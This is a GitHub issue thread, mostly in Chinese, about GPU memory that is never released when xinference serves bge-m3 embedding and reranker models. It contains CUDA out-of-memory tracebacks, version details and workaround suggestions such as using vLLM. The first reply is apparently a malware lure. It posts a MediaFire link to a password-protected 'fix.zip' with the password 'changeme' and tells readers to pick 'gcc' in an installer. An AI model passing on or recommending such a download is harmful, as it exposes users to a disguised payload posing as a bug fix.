### ISSUE TITLE
embedding模型和rerank模型显存不释放

### ISSUE THREAD

**Issue by zyc130130** [xorbitsai/inference#2162]
### System Info / 系統信息

Ubuntu 
CUDA Version: 12.2 
Name: transformers Version: 4.40.2
Name: vllm Version: 0.4.2
Name: torch Version: 2.3.0

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [X] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

v0.10.3

### The command used to start Xinference / 用以启动 xinference 的命令

xinference-local --host 0.0.0.0 --port 9997

### Reproduction / 复现过程

1.启动xinference
2.加载模型，llm，embedding：bge-m3，rerank：bge-reranker-v2-m3
3.embedding和rerank

### Expected behavior / 期待表现

显存正常释放

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zyc130130** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what's this？

**Comment by aidfsoft** [comment]
bge-reranker-v2-m3
  显存一直增加，有什么处理方法吗

**Comment by qinxuye** [comment]
我们自己一直没能重现，是请求显存一直增长？

**Comment by yushengliao** [comment]
@qinxuye   我这里也有相同的问题。
使用bge-reranker-v2-m3  刚启动的时候占用不到2G显存。 运行一段时间后占用10G+

如下图。10G+的就是bge-reranker-v2-m3 

![image](https://github.com/user-attachments/assets/e0da1cf7-8ccd-4fbc-b30c-e4ad73103527)

**Comment by qinxuye** [comment]
主要是 rerank 的问题？

**Comment by zyc130130** [comment]
> 我们自己一直没能重现，是请求显存一直增长？

是的，一直增长，在0.9.3和最新的0.14.3都测试了，我看源码中0.14.3增加了empty_cache()，同时有个计数，调用10次会调用empty_cache（），尝试修改源码计数为1和del中间变量，测试时发现还是会有显存一直增长的情况

**Comment by zyc130130** [comment]
> 主要是 rerank 的问题？

embedding也有，llm没测试

**Comment by qinxuye** [comment]
收到，我看下能不能复现。

**Comment by qinxuye** [comment]
试了下，发了很多请求，显存还挺稳定的。不知道如何复现你们说的情况。

**Comment by AAEE86** [comment]
我也遇到这个情况了 也是bge-reranker-v2-m3这个模型

**Comment by qinxuye** [comment]
你们注册自定义了吗？

**Comment by yushengliao** [comment]
> 你们注册自定义了吗？

没有

**Comment by AAEE86** [comment]
2024-08-29 15:48:38,197 xinference.core.cache_tracker 76 WARNING  Not record version info for model_name: CogVideoX-2b

日志有一处警告 似乎与这个有关

**Comment by AAEE86** [comment]
> 2024-08-29 15:48:38,197 xinference.core.cache_tracker 76 WARNING Not record version info for model_name: CogVideoX-2b
> 
> 日志有一处警告 似乎与这个有关

bge-reranker-v2-m3 这个模型

**Comment by AAEE86** [comment]
刚刚测试了下，已经20分钟了依旧没释放.

**Comment by zyc130130** [comment]
> 你们注册自定义了吗？

注册了，用的都是注册的自定义

**Comment by yushengliao** [comment]
我使用0.14.3版本，embedding模型bge-m3   同样不会释放内存。

另外发现一个问题：
同样是bge-m3 ，xinference比ollama快非常多，但是xinference会开辟更多的显存空间，甚至在显存不够的情况下出现OOM。
而ollama的显存占用几乎不变。

以下是xinference的报错，一个bge-m3模型要用到10G+显存，应该不太合理吧？


torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 7.22 GiB. GPU 0 has a total capacity of 21.98 GiB of which 6.02 GiB is free. Process 14122 has 2.77 GiB memory in use. Process 21945 has 1.57 GiB memory in use. Process 22838 has 1.02 GiB memory in use. Process 19044 has 10.57 GiB memory in use. Of the allocated memory 10.29 GiB is allocated by PyTorch, and 14.03 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation.  See documentation for Memory Management  (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)
2024-09-03 00:43:40,729 xinference.api.restful_api 1 ERROR    Remote server 0.0.0.0:39080 closed
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/xinference/api/restful_api.py", line 1189, in create_embedding
    embedding = await model.create_embedding(body.input, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 230, in send
    result = await self._wait(future, actor_ref.address, send_message)  # type: ignore
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 115, in _wait
    return await future
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/core.py", line 84, in _listen
    raise ServerClosed(
xoscar.errors.ServerClosed: Remote server 0.0.0.0:39080 closed
2024-09-03 00:43:40,854 xinference.core.worker 44 WARNING  Process 0.0.0.0:39080 is down.
2024-09-03 00:43:40,856 xinference.core.worker 44 DEBUG    Enter terminate_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>, 'bge-m3-1-0'), kwargs: {}
2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG    Destroy model actor failed, model uid: bge-m3-1-0, error: [Errno 111] Connection refused
2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG    Remove sub pool failed, model uid: bge-m3-1-0, error: '0.0.0.0:39080'
2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG    Leave terminate_model, elapsed time: 0 s
2024-09-03 00:43:40,857 xinference.core.worker 44 WARNING  Recreating model actor bge-m3-1-0 ...
2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG    Enter launch_builtin_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>,), kwargs: {'model_uid': 'bge-m3-1-0', 'model_name': 'bge-m3', 'model_size_in_billions': None, 'model_format': None, 'quantization': None, 'model_engine': None, 'model_type': 'embedding', 'n_gpu': 'auto', 'peft_model_config': None, 'request_limits': None, 'gpu_idx': None, 'download_hub': None, 'model_path': '/root/.xinference/cache/bge-m3'}
2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG    GPU selected: [0] for model bge-m3-1-0
2024-09-03 00:43:47,130 xinference.model.embedding.core 44 DEBUG    Embedding model bge-m3 found in ModelScope.
2024-09-03 00:43:48,389 transformers.configuration_utils 313 INFO     loading configuration file /root/.xinference/cache/bge-m3/config.json
2024-09-03 00:43:48,389 transformers.dynamic_module_utils 313 INFO     Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {}
2024-09-03 00:43:48,390 transformers.configuration_utils 313 INFO     Model config XLMRobertaConfig {
  "_name_or_path": "/root/.xinference/cache/bge-m3",
  "architectures": [
    "XLMRobertaModel"
  ],
  "attention_probs_dropout_prob": 0.1,
  "bos_token_id": 0,
  "classifier_dropout": null,
  "eos_token_id": 2,
  "hidden_act": "gelu",
  "hidden_dropout_prob": 0.1,
  "hidden_size": 1024,
  "initializer_range": 0.02,
  "intermediate_size": 4096,
  "layer_norm_eps": 1e-05,
  "max_position_embeddings": 8194,
  "model_type": "xlm-roberta",
  "num_attention_heads": 16,
  "num_hidden_layers": 24,
  "output_past": true,
  "pad_token_id": 1,
  "position_embedding_type": "absolute",
  "torch_dtype": "float32",
  "transformers_version": "4.43.4",
  "type_vocab_size": 1,
  "use_cache": true,
  "vocab_size": 250002
}

2024-09-03 00:43:48,447 transformers.dynamic_module_utils 313 INFO     Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {}
2024-09-03 00:43:48,450 transformers.modeling_utils 313 INFO     loading weights file /root/.xinference/cache/bge-m3/model.safetensors
2024-09-03 00:43:48,606 transformers.modeling_utils 313 INFO     All model checkpoint weights were used when initializing XLMRobertaModel.

2024-09-03 00:43:48,606 transformers.modeling_utils 313 INFO     All the weights of XLMRobertaModel were initialized from the model checkpoint at /root/.xinference/cache/bge-m3.
If your task is similar to the task the model of the checkpoint was trained on, you can already use XLMRobertaModel for predictions without further training.
2024-09-03 00:43:48,611 transformers.dynamic_module_utils 313 INFO     Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {}
2024-09-03 00:43:48,611 transformers.tokenization_utils_base 313 INFO     loading file sentencepiece.bpe.model
2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO     loading file tokenizer.json
2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO     loading file added_tokens.json
2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO     loading file special_tokens_map.json
2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO     loading file tokenizer_config.json
2024-09-03 00:43:49,934 xinference.core.worker 44 DEBUG    Leave launch_builtin_model, elapsed time: 9 s
2024-09-03 00:46:30,255 xinference.core.supervisor 44 DEBUG    Enter get_model, args: (<xinference.core.supervisor.SupervisorActor object at 0x7f627dde1e90>, 'bge-m3'), kwargs: {}
2024-09-03 00:46:30,256 xinference.core.worker 44 DEBUG    Enter get_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>,), kwargs: {'model_uid': 'bge-m3-1-0'}
2024-09-03 00:46:30,256 xinference.core.worker 44 DEBUG    Leave get_model, elapsed time: 0 s
2024-09-03 00:46:30,256 xinference.core.supervisor 44 DEBUG    Leave get_model, elapsed time: 0 s

**Comment by AAEE86** [comment]
> 我使用0.14.3版本，embedding模型bge-m3 同样不会释放内存。
> 
> 另外发现一个问题： 同样是bge-m3 ，xinference比ollama快非常多，但是xinference会开辟更多的显存空间，甚至在显存不够的情况下出现OOM。 而ollama的显存占用几乎不变。
> 
> 以下是xinference的报错，一个bge-m3模型要用到10G+显存，应该不太合理吧？
> 
> torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 7.22 GiB. GPU 0 has a total capacity of 21.98 GiB of which 6.02 GiB is free. Process 14122 has 2.77 GiB memory in use. Process 21945 has 1.57 GiB memory in use. Process 22838 has 1.02 GiB memory in use. Process 19044 has 10.57 GiB memory in use. Of the allocated memory 10.29 GiB is allocated by PyTorch, and 14.03 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables) 2024-09-03 00:43:40,729 xinference.api.restful_api 1 ERROR Remote server 0.0.0.0:39080 closed Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/xinference/api/restful_api.py", line 1189, in create_embedding embedding = await model.create_embedding(body.input, **kwargs) File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 230, in send result = await self._wait(future, actor_ref.address, send_message) # type: ignore File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 115, in _wait return await future File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/core.py", line 84, in _listen raise ServerClosed( xoscar.errors.ServerClosed: Remote server 0.0.0.0:39080 closed 2024-09-03 00:43:40,854 xinference.core.worker 44 WARNING Process 0.0.0.0:39080 is down. 2024-09-03 00:43:40,856 xinference.core.worker 44 DEBUG Enter terminate_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>, 'bge-m3-1-0'), kwargs: {} 2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG Destroy model actor failed, model uid: bge-m3-1-0, error: [Errno 111] Connection refused 2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG Remove sub pool failed, model uid: bge-m3-1-0, error: '0.0.0.0:39080' 2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG Leave terminate_model, elapsed time: 0 s 2024-09-03 00:43:40,857 xinference.core.worker 44 WARNING Recreating model actor bge-m3-1-0 ... 2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG Enter launch_builtin_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>,), kwargs: {'model_uid': 'bge-m3-1-0', 'model_name': 'bge-m3', 'model_size_in_billions': None, 'model_format': None, 'quantization': None, 'model_engine': None, 'model_type': 'embedding', 'n_gpu': 'auto', 'peft_model_config': None, 'request_limits': None, 'gpu_idx': None, 'download_hub': None, 'model_path': '/root/.xinference/cache/bge-m3'} 2024-09-03 00:43:40,857 xinference.core.worker 44 DEBUG GPU selected: [0] for model bge-m3-1-0 2024-09-03 00:43:47,130 xinference.model.embedding.core 44 DEBUG Embedding model bge-m3 found in ModelScope. 2024-09-03 00:43:48,389 transformers.configuration_utils 313 INFO loading configuration file /root/.xinference/cache/bge-m3/config.json 2024-09-03 00:43:48,389 transformers.dynamic_module_utils 313 INFO Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {} 2024-09-03 00:43:48,390 transformers.configuration_utils 313 INFO Model config XLMRobertaConfig { "_name_or_path": "/root/.xinference/cache/bge-m3", "architectures": [ "XLMRobertaModel" ], "attention_probs_dropout_prob": 0.1, "bos_token_id": 0, "classifier_dropout": null, "eos_token_id": 2, "hidden_act": "gelu", "hidden_dropout_prob": 0.1, "hidden_size": 1024, "initializer_range": 0.02, "intermediate_size": 4096, "layer_norm_eps": 1e-05, "max_position_embeddings": 8194, "model_type": "xlm-roberta", "num_attention_heads": 16, "num_hidden_layers": 24, "output_past": true, "pad_token_id": 1, "position_embedding_type": "absolute", "torch_dtype": "float32", "transformers_version": "4.43.4", "type_vocab_size": 1, "use_cache": true, "vocab_size": 250002 }
> 
> 2024-09-03 00:43:48,447 transformers.dynamic_module_utils 313 INFO Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {} 2024-09-03 00:43:48,450 transformers.modeling_utils 313 INFO loading weights file /root/.xinference/cache/bge-m3/model.safetensors 2024-09-03 00:43:48,606 transformers.modeling_utils 313 INFO All model checkpoint weights were used when initializing XLMRobertaModel.
> 
> 2024-09-03 00:43:48,606 transformers.modeling_utils 313 INFO All the weights of XLMRobertaModel were initialized from the model checkpoint at /root/.xinference/cache/bge-m3. If your task is similar to the task the model of the checkpoint was trained on, you can already use XLMRobertaModel for predictions without further training. 2024-09-03 00:43:48,611 transformers.dynamic_module_utils 313 INFO Patched resolve_trust_remote_code: (False, '/root/.xinference/cache/bge-m3', True, False) {} 2024-09-03 00:43:48,611 transformers.tokenization_utils_base 313 INFO loading file sentencepiece.bpe.model 2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO loading file tokenizer.json 2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO loading file added_tokens.json 2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO loading file special_tokens_map.json 2024-09-03 00:43:48,612 transformers.tokenization_utils_base 313 INFO loading file tokenizer_config.json 2024-09-03 00:43:49,934 xinference.core.worker 44 DEBUG Leave launch_builtin_model, elapsed time: 9 s 2024-09-03 00:46:30,255 xinference.core.supervisor 44 DEBUG Enter get_model, args: (<xinference.core.supervisor.SupervisorActor object at 0x7f627dde1e90>, 'bge-m3'), kwargs: {} 2024-09-03 00:46:30,256 xinference.core.worker 44 DEBUG Enter get_model, args: (<xinference.core.worker.WorkerActor object at 0x7f627dde2ca0>,), kwargs: {'model_uid': 'bge-m3-1-0'} 2024-09-03 00:46:30,256 xinference.core.worker 44 DEBUG Leave get_model, elapsed time: 0 s 2024-09-03 00:46:30,256 xinference.core.supervisor 44 DEBUG Leave get_model, elapsed time: 0 s

xinference的确会占用更多的显存
我测试了[qwen2-7b-instruct-q4_0.gguf](https://huggingface.co/Qwen/Qwen2-7B-Instruct-GGUF/blob/main/qwen2-7b-instruct-q4_0.gguf)
在xinference中使用llama.cpp占用8G+
在ollama中占用仅5G+
速度我并没有感觉太大的差异

**Comment by linqingxu** [comment]
有解决方案吗，我用的也是bge-m3+bge-reranker-large-m3模型，显存会一直叠加，之后模型掉线

**Comment by deific** [comment]
问题依然存在

**Comment by HuuHuy227** [comment]
> 有解决方案吗，我用的也是bge-m3+bge-reranker-large-m3模型，显存会一直叠加，之后模型掉线

I'm facing the same issues

**Comment by chaoStart** [comment]
![xinference报错](https://github.com/user-attachments/assets/bdbd440e-3746-466e-9bfb-7771a6318bde)
自定义的嵌入模型，每次调用都会生成一个新的嵌入模型，把显存卡爆了

**Comment by chaoStart** [comment]
> 有解决方案吗，我用的也是bge-m3+bge-reranker-large-m3模型，显存会一直叠加，之后模型掉线

我也是，每次调用就新增一次模型。

**Comment by qinxuye** [comment]
> > 有解决方案吗，我用的也是bge-m3+bge-reranker-large-m3模型，显存会一直叠加，之后模型掉线
> 
> 我也是，每次调用就新增一次模型。

你用法不对吧，看样子你调用了 launch 模型。

**Comment by zhudongwork** [comment]
> 有解决方案吗，我用的也是bge-m3+bge-reranker-large-m3模型，显存会一直叠加，之后模型掉线

一样的问题，显存消耗特别快，然后就直接爆显存了

**Comment by zhudongwork** [comment]
> 试了下，发了很多请求，显存还挺稳定的。不知道如何复现你们说的情况。

你用长文本去请求几次就能复现了。
建议直接为embedding和rerank增加vllm backend。0.6.3开始vllm已经支持这2类模型的推理了。我本地改为vLLM推理，速度和显存都非常稳定，即使长文本推理也不会显存抖增。

**Comment by JeoJava** [comment]
怎么解决啊大佬们

**Comment by dinysen** [comment]
我遇到了同样的问题，确实去掉launch_model，直接用model uid get之后使用就行了，没有自动生成缓存了

**Comment by kidcad1412** [comment]
> 我遇到了同样的问题，确实去掉launch_model，直接用model uid get之后使用就行了，没有自动生成缓存了

请问一下这个是在哪里设置？

**Comment by JeoJava** [comment]
xinference 能不能解决下啊。。。。我15条 500个字的doc就直接爆了（32G）正常吗？

**Comment by 37cc-start** [comment]
qwen3-rerank-8b模型也是 长文本直接爆了

**Comment by zhudongwork** [comment]
> xinference 能不能解决下啊。。。。我15条 500个字的doc就直接爆了（32G）正常吗？

改为vLLM推理

**Comment by zhudongwork** [comment]
> qwen3-rerank-8b模型也是 长文本直接爆了

改为vLLM推理

**Comment by qinxuye** [comment]
vLLM 引擎没有这个问题？

**Comment by 37cc-start** [comment]
还是会爆  文档内容一多就会  占用的显存大概需要1小时才可以恢复
不同的问题也会增加显存占用 

![Image](https://github.com/user-attachments/assets/e73165d4-21c9-4fc2-b6f1-21cac32cee96)

025-07-01 17:03:36,641 xinference.model.rerank.core 1804 INFO     Rerank with kwargs: {}, model: Qwen3ForCausalLM(
  (model): _ModelWrapper(
    (model): Qwen3Model(
      (embed_tokens): Embedding(151669, 4096)
      (layers): ModuleList(
        (0-35): 36 x Qwen3DecoderLayer(
          (self_attn): Qwen3Attention(
            (q_proj): Linear(in_features=4096, out_features=4096, bias=False)
            (k_proj): Linear(in_features=4096, out_features=1024, bias=False)
            (v_proj): Linear(in_features=4096, out_features=1024, bias=False)
            (o_proj): Linear(in_features=4096, out_features=4096, bias=False)
            (q_norm): Qwen3RMSNorm((128,), eps=1e-06)
            (k_norm): Qwen3RMSNorm((128,), eps=1e-06)
          )
          (mlp): Qwen3MLP(
            (gate_proj): Linear(in_features=4096, out_features=12288, bias=False)
            (up_proj): Linear(in_features=4096, out_features=12288, bias=False)
            (down_proj): Linear(in_features=12288, out_features=4096, bias=False)
            (act_fn): SiLU()
          )
          (input_layernorm): Qwen3RMSNorm((4096,), eps=1e-06)
          (post_attention_layernorm): Qwen3RMSNorm((4096,), eps=1e-06)
        )
      )
      (norm): Qwen3RMSNorm((4096,), eps=1e-06)
      (rotary_emb): Qwen3RotaryEmbedding()
    )
  )
  (lm_head): Linear(in_features=4096, out_features=151669, bias=False)
)
2025-07-01 17:03:37,057 xinference.core.model 1804 ERROR    Model actor is out of memory, model id: Qwen3-Reranker-8B-0, error: CUDA out of memory. Tried to allocate 74.00 MiB. GPU 0 has a total capacity of 39.38 GiB of which 42.69 MiB is free. Process 533968 has 1.45 GiB memory in use. Process 533976 has 1.58 GiB memory in use. Process 533972 has 1.74 GiB memory in use. Process 535717 has 34.54 GiB memory in use. Of the allocated memory 33.63 GiB is allocated by PyTorch, and 419.76 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation.  See documentation for Memory Management  (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)
Traceback (most recent call last):
  File "/opt/inference/xinference/core/model.py", line 147, in _async_wrapper
    return await fn(self, *args, **kwargs)
  File "/opt/inference/xinference/core/model.py", line 696, in _call_wrapper
    ret = await asyncio.to_thread(fn, *args, **kwargs)
  File "/usr/lib/python3.10/asyncio/threads.py", line 25, in to_thread
    return await loop.run_in_executor(None, func_call)
  File "/usr/lib/python3.10/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/opt/inference/xinference/model/rerank/core.py", line 384, in rerank
    similarity_scores.extend(self.compute_logits(inputs))
  File "/opt/inference/xinference/model/rerank/core.py", line 297, in compute_logits
    batch_scores = model(**inputs).logits[:, -1, :]
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1739, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1750, in _call_impl
    return forward_call(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/utils/generic.py", line 969, in wrapper
    output = func(self, *args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/models/qwen3/modeling_qwen3.py", line 730, in forward
    outputs: BaseModelOutputWithPast = self.model(
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1739, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1750, in _call_impl
    return forward_call(*args, **kwargs)
  File "/opt/inference/xinference/model/rerank/core.py", line 136, in forward
    return self.model(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1739, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1750, in _call_impl
    return forward_call(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/utils/generic.py", line 969, in wrapper
    output = func(self, *args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/models/qwen3/modeling_qwen3.py", line 463, in forward
    layer_outputs = decoder_layer(
  File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_layers.py", line 48, in __call__
    return super().__call__(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1739, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1750, in _call_impl
    return forward_call(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/models/qwen3/modeling_qwen3.py", line 300, in forward
    hidden_states = self.mlp(hidden_states)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1739, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1750, in _call_impl
    return forward_call(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/transformers/models/qwen3/modeling_qwen3.py", line 90, in forward
    down_proj = self.down_proj(self.act_fn(self.gate_proj(x)) * self.up_proj(x))
torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 74.00 MiB. GPU 0 has a total capacity of 39.38 GiB of which 42.69 MiB is free. Process 533968 has 1.45 GiB memory in use. Process 533976 has 1.58 GiB memory in use. Process 533972 has 1.74 GiB memory in use. Process 535717 has 34.54 GiB memory in use. Of the allocated memory 33.63 GiB is allocated by PyTorch, and 419.76 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation.  See documentation for Memory Management  (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)
2025-07-01 17:03:37,166 xinference.api.restful_api 7 ERROR    Model actor is out of memory, model id: Qwen3-Reranker-8B-0, error: CUDA out of memory. Tried to allocate 74.00 MiB. GPU 0 has a total capacity of 39.38 GiB of which 42.69 MiB is free. Process 533968 has 1.45 GiB memory in use. Process 533976 has 1.58 GiB memory in use. Process 533972 has 1.74 GiB memory in use. Process 535717 has 34.54 GiB memory in use. Of the allocated memory 33.63 GiB is allocated by PyTorch, and 419.76 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation.  See documentation for Memory Management  (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/xinference/api/restful_api.py", line 1498, in rerank
    scores = await model.rerank(
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 261, in send
    result = await self._wait(future, actor_ref.address, send_message)  # type: ignore
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/context.py", line 124, in _wait
    return await future
  File "/usr/local/lib/python3.10/dist-packages/xoscar/backends/core.py", line 104, in _listen
    raise ServerClosed(
xoscar.errors.ServerClosed: Remote server 0.0.0.0:37031 closed: 0 bytes read on a total of 11 expected bytes
2025-07-01 17:03:39,719 xinference.core.worker 173 WARNING  Process 0.0.0.0:37031 is down.

**Comment by 37cc-start** [comment]
启动命令： vllm版本0.8.5
xinference launch --model-type rerank --model-name Qwen3-Reranker-8B --model_path /models/Qwen/Qwen3-Reranker-8B --model-engine vllm

**Comment by qinxuye** [comment]
是 1.7.1.post1 吗？1.7.1 优化了 rerank 的显存占用。

**Comment by zhudongwork** [comment]
> 启动命令： vllm版本0.8.5 xinference launch --model-type rerank --model-name Qwen3-Reranker-8B --model_path /models/Qwen/Qwen3-Reranker-8B --model-engine vllm

qwen3-reranker建议用最新的vllm，启动方式我是直接修改的model/rerank/core.py，以支持vllm。启动后接入dify，跑检索测评（大概200个多测试query），topk=10，也没有出现显存爆炸。你的document切片非常长吗？

**Comment by qinxuye** [comment]
vllm 本质上 rerank 这些底下也就是 transformers。

**Comment by 37cc-start** [comment]
> > 启动命令： vllm版本0.8.5 xinference launch --model-type rerank --model-name Qwen3-Reranker-8B --model_path /models/Qwen/Qwen3-Reranker-8B --model-engine vllm
> 
> qwen3-reranker建议用最新的vllm，启动方式我是直接修改的model/rerank/core.py，以支持vllm。启动后接入dify，跑检索测评（大概200个多测试query），topk=10，也没有出现显存爆炸。你的document切片非常长吗？

大概一片750，topk=30，运行时你的显存占用大概是多少呢
我试试更新vllm
